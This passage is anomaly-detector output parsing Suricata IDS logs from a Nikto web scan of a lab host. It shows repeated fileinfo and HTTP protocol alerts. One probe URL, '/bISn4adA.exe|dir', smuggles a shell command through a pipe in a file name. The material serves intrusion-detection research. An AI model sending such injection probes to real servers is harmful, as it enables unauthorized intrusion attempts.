"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46918, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2026627547191976, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80", "/parser/model/time": 1583349514.321065, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46920, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.exe|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.321278, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46920, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783528103273160, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80", "/parser/model/time": 1583349514.324976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46922, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.325456, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46922, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1513189976763438, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80", "/parser/model/time": 1583349514.32736, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", 
"/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46924, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pdf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.32756, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":15431801437120,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
